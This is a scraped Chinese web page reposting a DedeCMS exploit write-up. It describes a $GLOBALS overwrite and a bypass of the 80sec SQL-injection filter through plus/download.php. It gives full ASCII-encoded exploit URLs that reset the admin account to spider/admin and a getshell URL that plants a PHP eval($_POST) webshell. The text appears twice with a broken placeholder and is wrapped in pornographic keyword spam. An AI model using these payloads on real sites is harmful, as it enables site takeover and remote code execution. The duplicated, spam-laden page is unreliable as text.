校园春色亚洲色图_亚洲视频分类_中文字幕精品一区二区精品_麻豆一区区三区四区产品精品蜜桃

主頁 > 網站建設 > 建站知識 > dedecms教程:織夢最新版本修改任意管理員漏洞

dedecms教程:織夢最新版本修改任意管理員漏洞

POST TIME:2020-04-04 18:20

此漏洞無視gpc轉義,過80sec注入防御。

補充下,不用擔心后臺找不到。這只是一個demo,都能修改任意數據庫了,還怕拿不到SHELL?

起因是全局變量$GLOBALS可以被任意修改,隨便看了下,漏洞一堆,我只找了一處。

include/dedesql.class.php

if(isset($GLOBALS['arrs1'])) { $v1 = $v2 = ''; for($i=0;isset($arrs1[$i]);$i++) { $v1 .= chr($arrs1[$i]); } for($i=0;isset($arrs2[$i]);$i++) { $v2 .= chr($arrs2[$i]); //解碼ascii } $GLOBALS[$v1] .= $v2; //注意這里不是覆蓋,是+ } function SetQuery($sql) { $prefix="zmb_"; $sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql); //看到這里無話可說,不明白為什么要這樣做。 $this->queryString = $sql; }

另外說下繞過80sec防注入的方法。
同一文件中,有兩個執行SQL的函數。ExecuteNoneQuery和ExecuteNoneQuery2
而用ExecuteNoneQuery2執行SQL并沒有防注入,于是隨便找個用ExecuteNoneQuery2執行的文件。

plus/download.php

else if($open==1) { $id = isset($id) && is_numeric($id) ? $id : 0; $link = base64_decode(urldecode($link)); $hash = md5($link); //這里的#@_是可以控制的 $rs = $dsql->ExecuteNoneQuery2("UPDATE `dede_downloads` SET downloads = downloads + 1 WHERE hash='$hash' "); if($rs <= 0) { $query = " INSERT INTO `dede_downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); "; $dsql->ExecNoneQuery($query); } header("location:$link"); exit(); }

構造SQL語句 (提交的時候用ascii加密,程序會幫我們自動解密的,所以無視gpc):

admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #

完整SQL語句:

UPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash'

EXP:

http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35

如果不出問題,后臺登錄用戶spider密碼admin
漏洞真的不止一處,各種包含,遠程代碼執行,很多,列位慢慢研究。

如果找不到后臺,參見以前修改數據庫直接拿SHELL的方法

UPDATE `dede_mytag` SET `normbody` = '{dede:php}file_put_contents(''spider.php'',''<!--?php eval(

此漏洞無視gpc轉義,過80sec注入防御。

補充下,不用擔心后臺找不到。這只是一個demo,都能修改任意數據庫了,還怕拿不到SHELL?

起因是全局變量$GLOBALS可以被任意修改,隨便看了下,漏洞一堆,我只找了一處。

include/dedesql.class.php

if(isset($GLOBALS['arrs1'])) { $v1 = $v2 = ''; for($i=0;isset($arrs1[$i]);$i++) { $v1 .= chr($arrs1[$i]); } for($i=0;isset($arrs2[$i]);$i++) { $v2 .= chr($arrs2[$i]); //解碼ascii } $GLOBALS[$v1] .= $v2; //注意這里不是覆蓋,是+ } function SetQuery($sql) { $prefix="zmb_"; $sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql); //看到這里無話可說,不明白為什么要這樣做。 $this->queryString = $sql; }

另外說下繞過80sec防注入的方法。
同一文件中,有兩個執行SQL的函數。ExecuteNoneQuery和ExecuteNoneQuery2
而用ExecuteNoneQuery2執行SQL并沒有防注入,于是隨便找個用ExecuteNoneQuery2執行的文件。

plus/download.php

else if($open==1) { $id = isset($id) && is_numeric($id) ? $id : 0; $link = base64_decode(urldecode($link)); $hash = md5($link); //這里的#@_是可以控制的 $rs = $dsql->ExecuteNoneQuery2("UPDATE `zmb_downloads` SET downloads = downloads + 1 WHERE hash='$hash' "); if($rs <= 0) { $query = " INSERT INTO `zmb_downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); "; $dsql->ExecNoneQuery($query); } header("location:$link"); exit(); }

構造SQL語句 (提交的時候用ascii加密,程序會幫我們自動解密的,所以無視gpc):

admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #

完整SQL語句:

UPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash'

EXP:

http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35

如果不出問題,后臺登錄用戶spider密碼admin

漏洞真的不止一處,各種包含,遠程代碼執行,很多,列位慢慢研究。

如果找不到后臺,參見以前修改數據庫直接拿SHELL的方法

___FCKpd___6

getshell:

http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35


收縮
  • 微信客服
  • 微信二維碼

  • 電話咨詢

  • 400-1100-266
校园春色亚洲色图_亚洲视频分类_中文字幕精品一区二区精品_麻豆一区区三区四区产品精品蜜桃
国产精品素人视频| 欧美—级在线免费片| 欧美国产成人在线| 这里只有精品视频在线观看| 欧美日韩国产系列| 欧美日韩免费一区二区三区视频| 国产老肥熟一区二区三区| 久久综合成人精品亚洲另类欧美| 国产乱码精品一品二品| 欧美激情在线一区二区三区| 欧洲精品中文字幕| 国产成人综合亚洲网站| 欧美日韩一区二区不卡| 精品中文av资源站在线观看| 国产精品电影一区二区三区| 91精品欧美一区二区三区综合在| 国产老女人精品毛片久久| 奇米精品一区二区三区在线观看一| 国产三级欧美三级日产三级99| 色婷婷精品大视频在线蜜桃视频| 久久99精品国产91久久来源| 精品裸体舞一区二区三区| 久久精品国产在热久久| 日韩免费高清av| 国产在线精品免费| 国产精品久线观看视频| 国产精品婷婷午夜在线观看| 国产三区在线成人av| 国产精品三级视频| 欧美精品一级二级| 日韩中文字幕区一区有砖一区 | 美女视频网站久久| 欧美不卡一区二区| av在线播放不卡| 亚洲午夜免费视频| 欧美一区二区播放| 免费高清在线视频一区·| 亚洲国产成人午夜在线一区 | 日韩成人一区二区三区在线观看| 亚洲蜜臀av乱码久久精品蜜桃| 日韩精品一区二区三区视频| 欧美中文字幕亚洲一区二区va在线| 国产一区二区久久| 奇米影视在线99精品| 天涯成人国产亚洲精品一区av| 亚洲日本在线看| 中文字幕+乱码+中文字幕一区| 精品国产乱码久久久久久久| 91麻豆精品国产自产在线| 欧美日韩视频在线一区二区| 91美女精品福利| 99精品偷自拍| a在线播放不卡| 国产成人a级片| 自拍偷在线精品自拍偷无码专区 | 日韩欧美中文字幕制服| 久久影院午夜论| 一区二区日韩电影| 久久99精品国产91久久来源| 国产资源精品在线观看| 亚洲电影第三页| 亚洲精品高清视频在线观看| 国产精品成人在线观看| 亚洲bt欧美bt精品777| 日本不卡视频一二三区| 国产成人精品免费在线| 色婷婷综合久色| 精品国产免费人成在线观看| 国产精品久久久久久久久久久免费看| 亚洲最新在线观看| 麻豆成人久久精品二区三区小说| 成人国产精品免费网站| 欧美精品1区2区3区| 日本一区二区三区高清不卡| 日日摸夜夜添夜夜添国产精品| 国产乱子伦视频一区二区三区 | 色网站国产精品| 亚洲国产精品成人综合色在线婷婷 | 欧美成人a在线| 免费观看成人鲁鲁鲁鲁鲁视频| 欧美日韩国产小视频在线观看| 亚洲第一在线综合网站| 欧美日韩精品欧美日韩精品一综合| 亚洲一区二区欧美日韩 | 《视频一区视频二区| 色欧美88888久久久久久影院| 亚洲码国产岛国毛片在线| 欧美日韩国产高清一区二区 | 国产日韩视频一区二区三区| 成人性生交大片免费看中文| 亚洲色图20p| 欧美丰满嫩嫩电影| 国产精品亚洲午夜一区二区三区 | 视频一区欧美日韩| 精品国产乱码久久| 在线中文字幕一区| 亚洲天堂2014| 色女孩综合影院| 婷婷久久综合九色国产成人| 91精品国产综合久久福利 | 国产福利精品导航| 亚洲精品久久久蜜桃| 欧美三级电影精品| 中文在线一区二区| 亚洲综合在线免费观看| 欧美日韩一区二区在线视频| 蜜臀av性久久久久蜜臀aⅴ四虎| 亚洲精品一区二区三区香蕉 | 成人免费在线观看入口| 欧洲av一区二区嗯嗯嗯啊| 亚洲午夜久久久久久久久电影网 | 91麻豆精品国产无毒不卡在线观看 | 国产福利91精品| 亚洲国产乱码最新视频 | 成人黄页在线观看| 麻豆国产精品777777在线| 久久久亚洲高清| 国产在线精品一区二区| 国产精品久久久久久福利一牛影视 | 国产二区国产一区在线观看| 中文字幕第一区第二区| 欧美亚洲愉拍一区二区| 青青草91视频| 中文字幕的久久| 欧美一卡在线观看| kk眼镜猥琐国模调教系列一区二区| 一区二区三区在线观看动漫| 在线电影国产精品| 成人少妇影院yyyy| 日本欧美在线观看| 一区免费观看视频| 日韩欧美一级二级三级久久久| www.在线欧美| 久久99国产精品尤物| 亚洲午夜电影在线| 中文字幕成人网| 日韩限制级电影在线观看| 91成人在线免费观看| 成人综合在线观看| 国产在线不卡一区| 麻豆精品精品国产自在97香蕉| 国产精品久久久久久户外露出| 精品播放一区二区| 7777精品久久久大香线蕉| 色欧美88888久久久久久影院| 成人美女视频在线看| 国产真实精品久久二三区| 亚洲国产精品久久一线不卡| 亚洲女人的天堂| 亚洲人吸女人奶水| 中文幕一区二区三区久久蜜桃| 欧美v日韩v国产v| 欧美电影精品一区二区| 色欧美日韩亚洲| 欧美在线free| 欧美日韩久久久一区| 欧美久久一区二区| 91麻豆精品国产自产在线观看一区 | 曰韩精品一区二区| 亚洲精品美国一| 亚洲愉拍自拍另类高清精品| 亚洲乱码一区二区三区在线观看| 国产精品乱码一区二区三区软件| 国产日韩欧美a| 国产日本亚洲高清| 亚洲精品国产成人久久av盗摄| 亚洲在线中文字幕| 青青青爽久久午夜综合久久午夜 | 午夜精品视频一区| 久久精品国产久精国产爱| 国产乱码精品一品二品| 91小视频免费看| 日韩精品中文字幕一区二区三区 | 国产中文一区二区三区| 91老师国产黑色丝袜在线| 欧美日韩视频第一区| 中文字幕欧美激情| 亚洲高清免费视频| 成人精品免费网站| 欧美一区二区三区日韩| 国产精品视频第一区| 日韩国产在线观看| 91高清在线观看| 国产亚洲欧美激情| 日韩电影免费一区| 91久久精品一区二区三| 久久久夜色精品亚洲| 一区二区三区欧美在线观看| 国产日韩欧美电影| 国产精品国产三级国产普通话蜜臀| 亚洲国产精品一区二区久久恐怖片 | 久久婷婷综合激情| 亚洲国产一区二区三区| 国产91对白在线观看九色| 7777精品久久久大香线蕉| 亚洲激情在线激情| 色综合天天综合在线视频| 国产欧美日韩另类一区| 国产精品资源在线看| 日韩精品中文字幕一区二区三区 |